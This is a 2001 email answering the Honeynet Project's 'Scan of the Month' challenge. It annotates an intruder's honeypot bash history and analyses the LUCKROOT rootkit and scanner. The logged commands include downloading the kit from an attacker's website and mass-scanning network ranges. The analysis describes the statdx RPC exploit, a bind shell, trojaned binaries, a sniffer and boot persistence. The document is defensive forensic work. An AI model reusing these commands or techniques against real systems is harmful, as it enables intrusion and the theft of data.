From dkwan@ca.ibm.com Fri Mar 23 10:14:00 2001 Date: Tue, 20 Mar 2001 15:14:04 -0500 From: Derek Kwan To: project@honeynet.org Subject: Scan of the month [ Part 1, Text/PLAIN 253 lines. ] [ Unable to print this part. ] ################################### # 1.What is the blackhat attempting to do with his command line syntax? ################################### Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail > change directory to .mail Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail > oops, there is no .mail directory in current directory, or he/she thinks he/she is in > /usr/sbin.... Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR > let's start my favour plain text web browser lynx and grab a copy of LUCKROOT.TAR > > Note: LUCKROOT.TAR is actually a gzip file, original filename could be LUCKROOT.TAR.GZ > and maybe the file was uploaded from a WIndowz machine and therefore > 1) Lose the .GZ extension > 2) Filename become all UPPERcase (i.e. original filename maybe = luckroot.tar.gz) > Or, the attacker just want to make the file type not so obvious (?) Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y > y - Try to answer if want to quit lynx > Note: Seems like a few keystroke is missing from the capture..... There should be 'D' > for download, and some hits for key.... Hummmm... Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR > Let's untar the file.... Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu > oops! should specify f option last... ;) Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L > oops! Uppercase... 'U'... back space. Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR > Ah, finally... get it right... Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot > change into luckroot directory Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210 > launch a scan for 216.210.0.0 network > Owners: Total.Net, Pacific Coat NET, Advanced Telcom Group, Learning Tools International etc > (To name just a few....) Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 > launch a scan for 200.120.0.0 network Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120 > launch a scan for 64.120.0.0 network > Owner: Teligent Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200 > oops.... missed a '/'.... '.' is not in current PATH Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200 Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1 Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10 Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120 Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1 Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1 Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128 Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1 > Mostly @Home network... > Side note: we did get a few scans from 24. on port 111 that day.... is this honeypot > by any chance is on @Home network? Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20 > and so on ...... ################################### # 2.What does the tool accomplish? ################################### Scan for a subnet on port 111 look for RPC exploit. If found, then it will try to r00t it, create a shell on port 39168. Then thru the shell port, get some info (e.g. machine info 'uname -a', user info 'id') Download a copy of xzibit.tar.gz, unpack it, install it, then erase it. BTW, wonder of the attacker is a Hip Hop fan, there is a group actually call xzibit... ;) ################################### # 3.How does the tool work? ################################### First, luckgo is a shell script. It first define bunch of ANSI 'effects' (e.g. blink, color etc.. Remember the good old BBS days with ANSI art?) luckgo if it cannot find the binaries luckscan-a & luckstatdx it will compile a copy using gcc scan.log file will be remove if found (I don't know where is scan.log is coming from... maybe is some left over from debug?) then it will start the first binary, luckscan-a with default on port 111 Note: even the instruction from luckgo said to scan for class A address, but it can actually take up to 3 parameters and scan a smaller subnet (i.e. x.y.z.0-255) luckscan-a will then try to connect to port 111 and see if it can get any connections.... luckscan-a have set max number of socket to 1000... and if port 111 is accepting connection, it will prepare a command line "./luckstatdx -d 0 {ip addr}" and try to r00t the victim machine luckstatdx mainly contain a shellcode (I think I have seen an example of this shellcode some where on the web before, can't find it at the moment. It was a pretty well written paper...) and design for IA32 CPU (i.e. mainly target for x86 machines...) Once a machine is r00ted, it will install a Trojan 'xzibit' on victim machine. On victim machine the following command will be replace (or should I say 'Trojanlize') hdparm, ifconfig, install, netstat, ps, ssh_host_key, ssh_random_seed, top Note: * hdparm will go to /dev/ida/.inet and start "sshdu -f ./s" (start a trojan? ssh daemon using a 's' as the systemwide config file. then start linsniffer and pipe output to tcp.log * ifconfig is based on Source: net-tools 1.32-alpha net-tools@lina.inka.de (Bernd Eckenfels) Kernelsource: 2.1.9 ifconfig 1.22 (1996-05-09) * install will "Replacing netstat, ps, ifconfig, top", then files dsx & caca is created in /dev directory /dev/ida/.inet is created and these files will be moved there linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c Note: sl2new.c is missing..... wonder what is it. maybe is left over from debug? then "/usr/bin/hdparm -t1 -X53 -p" will be added to victim /etc/rc.d/rc.sysinit (so it can make sure after a reboot there is still a backdoor available!) then it will try to copy becys.cgi to these directoy (if exist) /home/httpd/cgi-bin /usr/local/httpd/cgi-bin /usr/local/apache/cgi-bin /www/httpd/cgi-bin /www/cgi-bin Once is done, it will send the IP, hostname to becys@becys.org with Subject "becys rewting" Then it will remove directory lamerk, and file xzibit.tar.gz Follow 'Utils' will be install linsniffer, logclear, s, sense, sl2, sshdu, becys.cgi Note: * becys.cgi seems to be a http daemon * sshdu seems to be bases on sshd ver 1.2.27 * sl2 I wonder if it is a scanner of somesort... "Usage: %s srcaddr dstaddr low high" sense is a perl script written by Mike Edulla for Sorts the output from LinSniffer * s is ssh server systemwide configuration file. * logclear will first kill all linsniffer, del tcp.log, touch tcp.log then start linsniffer and pipe output to tcp.log ################################### # 4.Is this tool a worm, or would you classify it as something else? ################################### Worm? I would say no. From Jargon dictionary. worm n. [from `tapeworm' in John Brunner's novel "The Shockwave Rider", via XEROX PARC] A program that propagates itself over a network, reproducing itself as it goes. Compare virus. Nowadays the term has negative connotations, as it is assumed that only crackers write worms. Perhaps the best-known example was Robert T. Morris's Great Worm of 1988, a `benign' one that got out of control and hogged hundreds of Suns and VAXen across the U.S. See also cracker, RTM, Trojan horse, ice. Since it doesn't seems like it will automagically infact other machines, so I guess this not a worm. Even LUCKROOT is just a tool that will assist r00t other victim box.... ################################### # 5.Is this tool original, or is it simply based on previous tools? # If based on previous tools, which ones and what is modified? ################################### LUCKROOT.TAR - done by becys luckgo - seem to be writen by becys w/ help from ReSpEkT luckscan-a.c - not sure who wrote it, maybe becys? luckstatdx.c - seems like written by ron1n (McDonalds drive-thru guy @ Sydney, Australia) as statdx and modify by becys statdx first appear (to my knowledge) Sat, 5 Aug 2000 03:43:20 EST at BUGTRAQ@SECURITYFOCUS.COM Prime targets are RedHat 6.0, 6.1 & 6.2, in the orginal code, ron1n talks about how's the bufferflow exploit works. And that part was taken out by becys in his/her luckstatdx.c ### # Bonus Question: # What information can you obtain about who is using or created the tool? ### Well from machine IP & machine name sent back to the e-mail address, I would say is becys@becys.org